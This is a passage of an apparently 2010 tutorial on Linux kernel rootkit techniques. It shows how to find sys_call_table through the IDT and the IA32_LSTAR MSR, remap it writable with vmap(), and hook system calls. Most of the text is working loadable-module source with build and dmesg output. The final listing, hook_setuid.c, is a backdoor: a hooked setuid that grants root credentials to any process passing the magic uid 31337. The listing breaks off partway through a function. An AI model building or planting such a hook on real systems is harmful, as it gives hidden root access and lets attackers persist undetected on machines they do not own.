Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
1352 lines (1020 sloc) 43.3 KB
Kernel Mode Hooking
- oblique 2010
0x01] Introduction
0x02] Kernel mode hooking basic theory
0x03] LKM - hello kernel
0x04] Interrupt Descriptor Table (IDT)
0x05] Get sys_call_table - Linux x86-32
0x06] Model-Specific Registers (MSRs)
0x07] Get sys_call_table - Linux x86-64
0x08] Get ia32_sys_call_table - Linux x86-64
0x09] Map to a writable memory
0x0A] Hook a system call
0x0B] Other ideas/methods
0x0C] Greets
0x0D] References
--[ 0x01 Introduction
In this article I will show you the basic technique that rootkits use,
which we can use to hook system calls in kernel mode. I will deal only
with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to
hook the setuid system call which when takes a "magic" uid as an
argument it will give root to the process.
--[ 0x02 Kernel mode hooking basic theory
The modern Operating Systems that work in x86 architecture, use the
well-known protected mode. In protected mode there are 4 different
privilege levels, 0 to 3 (a.k.a ring0 - ring3). The highest-level (the
least privileged) is the userland (ring3) and the lowest-level (the
highest privileged) is the kernel mode (ring0). Applications run in
userland and they use an interrupt to tell to the kernel which system
call have to execute. This interrupt in Linux x86-32 is the instruction
"int $0x80" and in Linux x86-64 is the instruction "syscall". When the
CPU takes the interrupt, it switch from ring3 to ring0 and it calls the
system_call. Lets see the source code for x86-32:
"arch/x86/kernel/entry_32.S" from [5]
...
...
ENTRY(system_call)
RING0_INT_FRAME
pushl %eax
CFI_ADJUST_CFA_OFFSET 4
SAVE_ALL
GET_THREAD_INFO(%ebp)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%ebp)
jnz syscall_trace_entry
cmpl $(nr_syscalls), %eax
jae syscall_badsys
syscall_call:
call *sys_call_table(,%eax,4)
movl %eax,PT_EAX(%esp)
syscall_exit:
LOCKDEP_SYS_EXIT
DISABLE_INTERRUPTS(CLBR_ANY)
TRACE_IRQS_OFF
movl TI_flags(%ebp), %ecx
testl $_TIF_ALLWORK_MASK, %ecx
jne syscall_exit_work
...
...
As you can see the instruction "call *sys_call_table(,%eax,4)" calls
the system call from a pointer array (sys_call_table) based on EAX
value. This values can be found at /usr/include/asm/unistd_32.h (for
x86-32) and /usr/include/asm/unistd_64.h (for x86-64).
The same thing happens at x86-64 but there, there is one more array,
the ia32_sys_call_table which is used in ia32_syscall. This is used for
32bit binary emulator.
To hook a system call we have to change its pointer from sys_call_table
with a pointer of another function that we have create which will call
the real pointer (if its needed). This cannot be done with a userland
program because it doesn't have access to the kernel memory (actually
you can, via /dev/kmem or /dev/mem), so we will use Loadable Kernel
Module (LKM) to write kernel mode programs. Many people know LKM as a
hardware driver which can be loaded from shell through the commands
modprobe or insmod. In fact LKM is a module that is loaded in kernel
memory and after that, it becomes part of the kernel.
In kernel 2.4 hooking is very easy because sys_call_table is exported,
so with "extern void *sys_call_table[];" you can get it and write to
it. Unlike 2.4, in kernel 2.6 the sys_call_table is not exported and
after 2.6.16-rc1 is read-only. There are solutions for these 2
problems, also there are 2 different ways to get the address of
sys_call_table which we are going to examine later.
--[ 0x03 LKM - hello kernel
Before I continue I will show how we can write and compile an LKM (if
you know how to do this just skip this section). An LKM does not have
main() but has other 2 functions. The init_module() which is called
when we load the module and the cleanup_module() which is called when
we (or the kernel) unload the module. The init_module() returns int, if
the int is negative number then the module will not be loaded and an
error is returned, if the int value is 0 then the module has been
loaded successfully. The functions which does not take arguments must
have void in parenthesis because of some programming style standards.
Another standard is that with the macro MODULE_LICENSE() we have to
declare the license of the module (more info:
http://kerneltrap.org/node/2991 ).
--file: hello_kernel.c--
#include <linux/module.h>
int init_module(void) {
printk(KERN_INFO "Hello kernel!");
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "Bye bye kernel!");
}
MODULE_LICENSE("GPL");
--EOF--
In kernel 2.6 there is one more way to declare the init and cleanup
functions and we can use any name we want.
init function declaration:
static int __init name_1(void) {
}
cleanup function declaration:
static void __exit name_2(void) {
}
and then we do this:
module_init(name_1);
module_exit(name_2);
A second example of hello_kernel.c:
--file: hello_kernel.c--
#include <linux/module.h>
static int __init hello_init(void) {
printk(KERN_INFO "Hello kernel!");
return 0;
}
static void __exit hello_exit(void) {
printk(KERN_INFO "Bye bye kernel!");
}
module_init(hello_init);
module_exit(hello_exit);
MODULE_LICENSE("GPL");
--EOF--
Kernel uses printk() to print a message. printk() has the same syntax
as printf() but first we have to define the type of the message. The
available types are: KERN_EMERG, KERN_ALERT, KERN_CRIT, KERN_ERR,
KERN_WARNING, KERN_NOTICE, KERN_INFO, KERN_DEBUG, KERN_DEFAULT,
KERN_CONT. To see these messages we have to run the command 'dmesg'
(more info: 'man dmesg').
To compile a module in kernel 2.6 we have to create a Makefile which
should have the variable obj-m. In obj-m we have to declare the modules
names but with .o extension. In our case is hello_kernel.o
--file: Makefile--
obj-m = hello_kernel.o
KDIR = /lib/modules/$(shell uname -r)/build
all:
make -C $(KDIR) M=$(PWD) modules
clean:
make -C $(KDIR) M=$(PWD) clean
--EOF--
(more info: "Documentation/kbuild/modules.txt" from [5])
-- NOTE --
Don't forget that the basic syntax of Makefile is:
<target>: [ <dependency > ]*
[ <TAB> <command> <endl> ]+
So in 5th and 7th line we must have Tabs instead of spaces before
"make". If you run 'make' and you got an error, check for this.
-- END OF NOTE --
After the creation of Makefile we have to run 'make' to compile the
module. Then we run as root 'insmod hello_kernel.ko' to load it and
'rmmod hello_kernel' to unload it.
oblique@gentoo ~/hello_kernel $ ls
hello_kernel.c Makefile
oblique@gentoo ~/hello_kernel $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hello_kernel modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
CC [M] /home/oblique/hello_kernel/hello_kernel.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/oblique/hello_kernel/hello_kernel.mod.o
LD [M] /home/oblique/hello_kernel/hello_kernel.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hello_kernel $ sudo insmod hello_kernel.ko
oblique@gentoo ~/hello_kernel $ dmesg
...
...
[60947.072113] Hello kernel!
oblique@gentoo ~/hello_kernel $ sudo rmmod hello_kernel
oblique@gentoo ~/hello_kernel $ dmesg
...
...
[60947.072113] Hello kernel!
[61105.613280] Bye bye kernel!
oblique@gentoo ~/hello_kernel $
--[ 0x04 Interrupt Descriptor Table (IDT)
IDT is a table in x86 architecture which can have up to 256 entries for
3 gate types (task gate, interrupt gate, trap gate). The "int $0x80" is
interrupt gate. This table actually is stored in kernel memory and the
kernel just loads its address to IDT Register (IDTR) with the
instruction LIDT. We can read this register using the instruction SIDT
which takes as destination operand a memory address. IDTR structure is:
x86-32:
BYTES NAMES
2 limit
4 base
x86-64:
BYTES NAMES
2 limit
8 base
base is the address where the IDT stars and by adding the limit to it,
we will get the table's last memory address. We can express ITDR with
this C struct:
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
-- NOTE --
The "__attribute__ ((packed));" tells the gcc to use the minimum amount
of memory required by the chosen type. In other words it will create a
struct that is exactly the bytes we want.
-- END OF NOTE --
Now we know that IDT address is base and has 3 gates. The descriptor of
IDT has this strcture:
x86-32:
BYTES NAMES
2 offset low bits (0..15)
2 segment selector
1 zero
1 type & flags
2 offset high bits (16..31)
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero;
unsigned char type_flags;
unsigned short offset_high;
} __attribute__ ((packed));
In type_flags there is the type of gate with same flags. From this
struct we will only need offset_low and offset_high. To get the offset
we have to write the following:
offset = (offset_high<<16) | offset_low
x86-64:
BYTES NAMES
2 offset low bits (0..15)
2 segment selector
1 zero
1 type & flags
2 offset middle bits (16..31)
4 offset high bits (32..63)
4 zero
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero1;
unsigned char type_flags;
unsigned short offset_middle;
unsigned int offset_high;
unsigned int zero2;
} __attribute__ ((packed));
Only offset_low, offset_middle and offset_high are needed here. Code
below gets the offset:
offset = (offset_high<<32) | (offset_middle<<16) | offset_low
--[ 0x05 Get sys_call_table - Linux x86-32
There are 2 ways to obtain the sys_call_table: 1) from some files
(/boot/System.map-(kernel_version), vmlinux, /proc/kallsyms) but maybe
these files doesn't even exist. 2) from IDT descriptor of interrupt
0x80.
Method 1:
oblique@gentoo ~ $ grep sys_call_table /boot/System.map-`uname -r`
c1582160 R sys_call_table
oblique@gentoo ~ $ nm /usr/src/linux/vmlinux | grep sys_call_table
c1582160 R sys_call_table
oblique@gentoo ~ $ grep sys_call_table /proc/kallsyms
oblique@gentoo ~ $ grep system_call /proc/kallsyms
c157fac4 T system_call
-- NOTE --
/usr/src/linux is the path of your kernel source. Also the addresses we
got differ from system to system.
-- END OF NOTE --
As we can see with the first 2 commands we got the address of
sys_call_table. File /proc/kallsyms doesn't contain it, but has the
system_call. Lets check system_call with gdb.
oblique@gentoo ~ $ gdb -q /usr/src/linux/vmlinux
Reading symbols from /usr/src/linux-2.6.34-zen1-r2/vmlinux...done.
(gdb) x/30i 0xc157fac4
0xc157fac4: push %eax
0xc157fac5: cld
0xc157fac6: push $0x0
0xc157fac8: push %fs
0xc157faca: push %es
0xc157facb: push %ds
0xc157facc: push %eax
0xc157facd: push %ebp
0xc157face: push %edi
0xc157facf: push %esi
0xc157fad0: push %edx
0xc157fad1: push %ecx
0xc157fad2: push %ebx
0xc157fad3: mov $0x7b,%edx
0xc157fad8: mov %edx,%ds
0xc157fada: mov %edx,%es
0xc157fadc: mov $0xd8,%edx
0xc157fae1: mov %edx,%fs
0xc157fae3: mov $0xffffe000,%ebp
0xc157fae8: and %esp,%ebp
0xc157faea: testl $0x100001d1,0x8(%ebp)
0xc157faf1: jne 0xc157fbd8
0xc157faf7: cmp $0x152,%eax
0xc157fafc: jae 0xc157fc21
0xc157fb02: call *-0x3ea7dea0(,%eax,4)
0xc157fb09: mov %eax,0x18(%esp)
0xc157fb0d: cli
0xc157fb0e: mov 0x8(%ebp),%ecx
0xc157fb11: test $0x1000feff,%ecx
0xc157fb17: jne 0xc157fbf8
Here we can see the first 30 instructions of system_call (0xc157fac4).
As I have shown before, there is a call that executes the system call
from sys_call_table. This call is at address 0xc157fb02 and the next
instruction is at 0xc157fb09. So 0xc157fb09 - 0xc157fb02 = 7 bytes.
(gdb) x/7xb 0xc157fb02
0xc157fb02: 0xff 0x14 0x85 0x60 0x21 0x58 0xc1
The first 3 bytes are the opcodes of the instruction and the address of
sys_call_table follows.
(gdb) x/xw 0xc157fb02 + 3
0xc157fb05: 0xc1582160
So now we found the address of sys_call_table. I will not implement
this method because I prefer the second.
Method 2:
As you should already know the interrupts are inside IDT. When we call
the instruction "int $0x80" the CPU goes to the IDT and takes the IDT
descriptor of interrupt 0x80 and then it jumps to the offset
representing the address of system_call. So from the offset we can
search for the pattern 0xff 0x14 0x85 and when we find it the next 4
bytes is the address of sys_call_table.
--file: get_sct.c--
#include <linux/module.h>
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero;
unsigned char type_flags;
unsigned short offset_high;
} __attribute__ ((packed));
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
void *get_sys_call_table(void) {
struct idtr idtr;
struct idt_descriptor idtd;
void *system_call;
unsigned char *ptr;
int i;
asm volatile("sidt %0" : "=m"(idtr));
memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
printk(KERN_INFO "system_call: 0x%p", system_call);
for (ptr=system_call, i=0; i<500; i++) {
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
return *((void**)(ptr+3));
ptr++;
}
return NULL;
}
static int __init sct_init(void) {
printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
return 0;
}
static void __exit sct_exit(void) {
}
module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
Explanation:
asm volatile("sidt %0" : "=m"(idtr));
memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
Here we get the IDTR and then with 'base + 0x80*sizeof(idtd)' we read
the IDT descriptor of interrupt 0x80.
system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
for (ptr=system_call, i=0; i<500; i++) {
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
return *((void**)(ptr+3));
ptr++;
}
Here we calculate the address of system_call and then with loop we
check for the pattern. After we find it we add 3 and we return what the
new address holds.
oblique@gentoo ~/hooking $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
CC [M] /home/oblique/hooking/get_sct.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/oblique/hooking/get_sct.mod.o
LD [M] /home/oblique/hooking/get_sct.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hooking $ sudo insmod get_sct.ko
oblique@gentoo ~/hooking $ dmesg | tail
...
...
[70274.087185] system_call: 0xc157fac4
[70274.087190] sys_call_table: 0xc1582160
oblique@gentoo ~/hooking $ sudo rmmod get_sct
--[ 0x06 Model-Specific Registers (MSRs)
MSRs are registers that are used for very specific CPU jobs. To write
to MSRs we use the instruction WRMSR and to read we use the instruction
RDMSR. These 2 instructions use 3 registers: EDX, EAX, ECX. ECX should
carry the value of the MSR we want to use. MSRs are 64bit registers, we
use EDX for the high bits and EAX for the low bits. The values that we
put in ECX can be found at [8].
--[ 0x07 Get sys_call_table - Linux x86-64
Instruction SYSCALL is used to call x86-64 system calls and it uses the
IA32_LSTAR MSR. According to [8] the IA32_LSTAR value is 0xc0000082.
The IA32_LSTAR MSR in fact holds the address of system_call.
"arch/x86/kernel/entry_64.S" from [5]
...
...
ENTRY(system_call)
CFI_STARTPROC simple
CFI_SIGNAL_FRAME
CFI_DEF_CFA rsp,KERNEL_STACK_OFFSET
CFI_REGISTER rip,rcx
SWAPGS_UNSAFE_STACK
ENTRY(system_call_after_swapgs)
movq %rsp,PER_CPU_VAR(old_rsp)
movq PER_CPU_VAR(kernel_stack),%rsp
ENABLE_INTERRUPTS(CLBR_NONE)
SAVE_ARGS 8,1
movq %rax,ORIG_RAX-ARGOFFSET(%rsp)
movq %rcx,RIP-ARGOFFSET(%rsp)
CFI_REL_OFFSET rip,RIP-ARGOFFSET
GET_THREAD_INFO(%rcx)
testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%rcx)
jnz tracesys
system_call_fastpath:
cmpq $__NR_syscall_max,%rax
ja badsys
movq %r10,%rcx
call *sys_call_table(,%rax,8)
movq %rax,RAX-ARGOFFSET(%rsp)
ret_from_sys_call:
...
...
The "call *sys_call_table(,%rax,8)" calls the system call. Lets see
system_call in gdb.
oblique@sandbox64:~$ grep sys_call_table /boot/System.map-`uname -r`
ffffffff81544380 R sys_call_table
ffffffff8154dff8 r ia32_sys_call_table
oblique@sandbox64:~$ grep system_call /boot/System.map-`uname -r`
ffffffff81012060 T system_call
ffffffff81012070 T system_call_after_swapgs
ffffffff810120dc t system_call_fastpath
oblique@sandbox64:~$ gdb -q /usr/src/linux/vmlinux
Reading symbols from /usr/src/linux-2.6.32/vmlinux...done.
(gdb) x/30i 0xffffffff81012060
0xffffffff81012060: swapgs
0xffffffff81012063: data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
0xffffffff81012070: mov %rsp,%gs:0xc6c8
0xffffffff81012079: mov %gs:0xcbc8,%rsp
0xffffffff81012082: push %rax
0xffffffff81012083: callq *0x790a0f(%rip) # 0xffffffff817a2a98
0xffffffff81012089: pop %rax
0xffffffff8101208a: sub $0x50,%rsp
0xffffffff8101208e: mov %rdi,0x40(%rsp)
0xffffffff81012093: mov %rsi,0x38(%rsp)
0xffffffff81012098: mov %rdx,0x30(%rsp)
0xffffffff8101209d: mov %rax,0x20(%rsp)
0xffffffff810120a2: mov %r8,0x18(%rsp)
0xffffffff810120a7: mov %r9,0x10(%rsp)
0xffffffff810120ac: mov %r10,0x8(%rsp)
0xffffffff810120b1: mov %r11,(%rsp)
0xffffffff810120b5: mov %rax,0x48(%rsp)
0xffffffff810120ba: mov %rcx,0x50(%rsp)
0xffffffff810120bf: mov %gs:0xcbc8,%rcx
0xffffffff810120c8: sub $0x1fd8,%rcx
0xffffffff810120cf: testl $0x100001d1,0x10(%rcx)
0xffffffff810120d6: jne 0xffffffff8101222c
0xffffffff810120dc: cmp $0x12a,%rax
0xffffffff810120e2: ja 0xffffffff810121b6
0xffffffff810120e8: mov %r10,%rcx
0xffffffff810120eb: callq *-0x7eabbc80(,%rax,8)
0xffffffff810120f2: mov %rax,0x20(%rsp)
0xffffffff810120f7: mov $0x1000feff,%edi
0xffffffff810120fc: mov %gs:0xcbc8,%rcx
0xffffffff81012105: sub $0x1fd8,%rcx
The instruction that we looking for is at 0xffffffff810120eb and it's 7
bytes.
(gdb) x/7xb 0xffffffff810120eb
0xffffffff810120eb: 0xff 0x14 0xc5 0x80 0x43 0x54 0x81
(gdb) x/xw 0xffffffff810120eb + 3
0xffffffff810120ee: 0x81544380
As you can see we have the sys_call_table address but it needs
0xffffffff as high bits. The pattern that we are looking for is not the
same as x86-32, now the pattern is 0xff 0x14 0xc5.
--file: get_sct64.c--
#include <linux/module.h>
#define IA32_LSTAR 0xc0000082
void *get_sys_call_table(void) {
void *system_call;
unsigned char *ptr;
int i, low, high;
asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));
system_call = (void*)(((long)high<<32) | low);
printk(KERN_INFO "system_call: 0x%p", system_call);
for (ptr=system_call, i=0; i<500; i++) {
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
ptr++;
}
return NULL;
}
static int __init sct_init(void) {
printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table());
return 0;
}
static void __exit sct_exit(void) {
}
module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
oblique@sandbox64:~/hooking$ sudo insmod get_sct641.ko
oblique@sandbox64:~/hooking$ dmesg | tail
...
...
[ 3027.560110] system_call: 0xffffffff81012060
[ 3027.560110] sys_call_table: 0xffffffff81544380
oblique@sandbox64:~/hooking$ sudo rmmod get_sct641
--[ 0x08 Get ia32_sys_call_table - Linux x86-64
x86-32 binaries as we know use interrupt 0x80 to call system calls,
so for being the kernel able to run x86-32 binaries, kernel developers
created the ia32_syscall which calls the system call from
ia32_sys_call_table. As we saw above the interrupts are defined in IDT,
so we already know the technique to get ia32_sys_call_table.
ia32_syscall uses the "call *ia32_sys_call_table(,%rax,8)" to call a
system call and the pattern that we are looking for is 0xff 0x14 0xc5.
--file: get_ia32_sct64.c--
#include <linux/module.h>
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero1;
unsigned char type_flags;
unsigned short offset_middle;
unsigned int offset_high;
unsigned int zero2;
} __attribute__ ((packed));
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
void *get_ia32_sys_call_table(void) {
struct idtr idtr;
struct idt_descriptor idtd;
void *ia32_syscall;
unsigned char *ptr;
int i;
asm volatile("sidt %0" : "=m"(idtr));
memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
ia32_syscall = (void*)(((long)idtd.offset_high<<32) |
(idtd.offset_middle<<16) | idtd.offset_low);
printk(KERN_INFO "ia32_syscall: 0x%p", ia32_syscall);
for (ptr=ia32_syscall, i=0; i<500; i++) {
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
ptr++;
}
return NULL;
}
static int __init sct_init(void) {
printk(KERN_INFO "ia32_sys_call_table: 0x%p", get_ia32_sys_call_table());
return 0;
}
static void __exit sct_exit(void) {
}
module_init(sct_init);
module_exit(sct_exit);
MODULE_LICENSE("GPL");
--EOF--
oblique@sandbox64:~/hooking$ grep ia32_syscall /boot/System.map-`uname -r`
ffffffff810464e0 T ia32_syscall
ffffffff8154ea80 r ia32_syscall_end
oblique@sandbox64:~/hooking$ grep ia32_sys_call_table /boot/System.map-`uname -r`
ffffffff8154dff8 r ia32_sys_call_table
oblique@sandbox64:~/hooking$ sudo insmod get_ia32_sct64.ko
oblique@sandbox64:~/hooking$ dmesg | tail
...
...
[ 5786.380128] ia32_syscall: 0xffffffff810464e0
[ 5786.380128] ia32_sys_call_table: 0xffffffff8154dff8
oblique@sandbox64:~/hooking$ sudo rmmod get_ia32_sct64
--[ 0x09 Map to a writable memory
As I have said in section 0x02, sys_call_table is read-only. This also
happens for other parts of kernel memory. The solution is to use
vmap().
void *vmap(struct page **pages, unsigned int count,
unsigned long flags, pgprot_t prot);
As we can see, vmap takes 4 arguments. The 1st argument is a pointers
array, pointing to some 'struct page', 2nd is the number of pages, 3rd
argument is about flags and 4th describes the memory protections.
Virtual memory is separated into pages, sized 4096 bytes each (we can
get that with PAGE_SIZE). If we are at the beginning of a page, the
page address will have zero in a range from 0 to 12 bits. If we are
not, then we can get the original address by performing a bitwise add
operation with PAGE_MASK. To transform a virtual address to a page
address we use virt_to_page() macro. A virtual address does belong to
the same page with another one, only if they differ at 0..12 bits.
According to [6] virt_to_page() was broken at x86-64 architecture and
it was fixed in version 2.6.22. In this case we will need to use the
"pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);" (addr will be the
variable with our address). Now, we will need some preprocessors, if
__i386__ is defined it means that compilation takes place in a x86-32
system, or if __x86_64__ is defined means that compilation takes place
in a x86-64 system. LINUX_VERSION_CODE contains the numeric value of
kernel version, and with KERNEL_VERSION() macro we can get the value of
any version we want, so we will need to include linux/version.h.
For calling vmap we have to include linux/vmalloc.h and linux/mm.h.
The 1st argument we pass consists of 2 page addresses because
sys_call_table can be probably separated in 2 pieces, if one of its
parts belongs to the next page. The 3rd argument is the flag VM_MAP
which makes vmap "understand" that we gave it an array of pages for
mapping. Finally, the 4th argument we pass is PAGE_KERNEL, which gives
us the privileges for gaining writing access to memory.
Vmap will return an address which is the beginning of the 1st page we
asked for, and for accessing sys_call_table we need to add its offset
to page. We can get this offset using offset_in_page() macro. Inside
cleanup function we have to call vunmap() for un-mapping the pages.
--function: get_writable_sct()--
void *get_writable_sct(void *sct_addr) {
struct page *p[2];
void *sct;
unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;
if (sct_addr == NULL)
return NULL;
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
p[0] = virt_to_page(addr);
p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
if (sct == NULL)
return NULL;
return sct + offset_in_page(sct_addr);
}
-- END OF FUNCTION --
-- EXAMPLE --
void **sys_call_table = get_writable_sct(get_sys_call_table());
// hook some system calls
vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
-- END OF EXAMPLE --
--[ 0x0A Hook a system call
To hook a system call, we should first store its real address and then
replace it with the address of the function we created. The definitions
of system calls functions are found inside "include/linux/syscalls.h"
[5]. As an example take a look at setuid definition:
asmlinkage long sys_setuid(uid_t uid);
asmlinkage is a macro which says to gcc that the arguments will be
passed through the stack and not through registers, in case of
optimization. In our module, we will define the following:
asmlinkage long (*real_setuid)(uid_t uid);
The real_setuid is a pointer to a function. After that we create our
function that it will call the real_setuid().
asmlinkage long hooked_setuid(uid_t uid) {
return real_setuid(uid);
}
In case we include asm/unistd_32.h we are going to have system calls
numbers for x86-32, or we can get the relevant numbers for x86-64 if we
include asm/unistd_64.h. In older glibc versions these files were
asm-i386/unistd.h and asm-x86_64/unistd.h. If we include asm/unistd.h,
a preprocessor will decide which one to use. In these files, system
calls definitions have __NR_ prefix. For example with __NR_setuid we
will get setuid's number. For hooking setuid we should write the
following:
real_setuid = sys_call_table[__NR_setuid];
sys_call_table[__NR_setuid] = hooked_setuid;
and while cleaning up for unhook we should do:
sys_call_table[__NR_setuid] = real_setuid;
When we want the module to work in both x86 architectures, we should
use preprocessors. If CONFIG_IA32_EMULATION is defined it means that
x86-32 system calls also work in x86-64 systems. The sys_call_table and
the ia32_sys_call_table both contain the same addresses, but in
different places. There is a little problem because in asm/unistd_32.h
and asm/unistd_64.h, values have the same names, so we can't include
them at the same time. A simple solution is to code a simple script
which detects whether the architecture is x86-64 and copies
asm/unistd_32.h (or asm-i386/unistd.h) in the same folder with our
source code, as well as replacing the prefix __NR_ with __NR32_.
--file: configure.sh--
#!/bin/sh
if [ `uname -m` = x86_64 ]; then
if [ -e /usr/include/asm/unistd_32.h ]; then
sed -e 's/__NR_/__NR32_/g' /usr/include/asm/unistd_32.h > unistd_32.h
else
if [ -e /usr/include/asm-i386/unistd.h ]; then
sed -e 's/__NR_/__NR32_/g' /usr/include/asm-i386/unistd.h > unistd_32.h
else
echo "asm/unistd_32.h and asm-386/unistd.h does not exist."
fi
fi
fi
--EOF--
Here we should include this:
#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif
with that we will actually hook it:
#ifdef CONFIG_IA32_EMULATION
ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
and with that unhook it:
#ifdef CONFIG_IA32_EMULATION
ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
Notice: Sometimes when they change completely the implementation of a
system call, because the precedent was deprecated, they don't change
the values, but they add new ones. Indeed after some version of x86-32,
setuid exists 2 times as sys_setuid16 and sys_setuid. sys_setuid16 has
the number of __NR_setuid and sys_setuid the number of __NR_setuid32.
In this case if we want, we can hook both and by making use of a
preprocessor to add some code. I am not going to implement this, but I
will show you the case we only want to hook sys_setuid.
hook:
#ifdef __NR_setuid32
real_setuid = sys_call_table[__NR_setuid32];
sys_call_table[__NR_setuid32] = hooked_setuid;
#else
real_setuid = sys_call_table[__NR_setuid];
sys_call_table[__NR_setuid] = hooked_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
#else
ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
#endif
unhook:
#ifdef __NR_setuid32
sys_call_table[__NR_setuid32] = real_setuid;
#else
sys_call_table[__NR_setuid] = real_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
ia32_sys_call_table[__NR32_setuid32] = real_setuid;
#else
ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
#endif
Before I provide you with the whole module's source code, let's make an
interesting modification in hooked_setuid. A nice concept is, after we
call setuid and give as uid parameter a "magic" number, to change
process uid and gid to 0. In other words to give process root
privileges.
Inside kernel exist lots of data structures that can be changed in
future versions if vulnerabilities are discovered or if they
implemented in a better way. One of these is 'struct task_struct' where
a lot of information about processes can be found. This struct contains
8 interesting variables:
uid_t uid, euid, suid, fsuid;
gid_t gid, egid, sgid, fsgid;
When targeting the running process we use 'current' macro. For these 2
we need to include linux/sched.h. For giving root privileges to a
process we should do the following:
current->uid = current->euid = current->suid = current->fsuid = 0;
current->gid = current->egid = current->sgid = current->fsgid = 0;
return 0;
This won't be functional for kernel 2.6.29 and above because the data
structure and the generally the method which assigns new uid and gid to
the process has changed. In the new method a new struct exists, the
'struct cred'. For changing uid and gid we should first call
prepare_creds(), which returns a pointer to a newly created 'struct
cred', and then we change the variables and we call commit_creds().
Finally we should return its results.
struct cred *cred = prepare_creds();
cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
return commit_creds(cred);
I strongly advice you to use kernel's git for understanding the kernel
changes.
( http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=tags )
--file: hook_setuid.c--
#include <linux/module.h>
#include <linux/version.h>
#include <linux/vmalloc.h>
#include <linux/mm.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif
#ifdef __i386__
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero;
unsigned char type_flags;
unsigned short offset_high;
} __attribute__ ((packed));
#elif defined(CONFIG_IA32_EMULATION)
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero1;
unsigned char type_flags;
unsigned short offset_middle;
unsigned int offset_high;
unsigned int zero2;
} __attribute__ ((packed));
#endif
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
void **sys_call_table;
#ifdef CONFIG_IA32_EMULATION
void **ia32_sys_call_table;
#endif
asmlinkage long (*real_setuid)(uid_t uid);
asmlinkage long hooked_setuid(uid_t uid) {
if (uid == 31337) {
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,29)
struct cred *cred = prepare_creds();
cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
return commit_creds(cred);
#else
current->uid = current->euid = current->suid = current->fsuid = 0;
current->gid = current->egid = current->sgid = current->fsgid = 0;
return 0;
#endif
}
return real_setuid(uid);
}
#if defined(__i386__) || defined(CONFIG_IA32_EMULATION)
#ifdef __i386__
void *get_sys_call_table(void) {
#elif defined(__x86_64__)
void *get_ia32_sys_call_table(void) {
#endif
struct idtr idtr;
struct idt_descriptor idtd;
void *system_call;
unsigned char *ptr;
int i;
asm volatile("sidt %0" : "=m"(idtr));
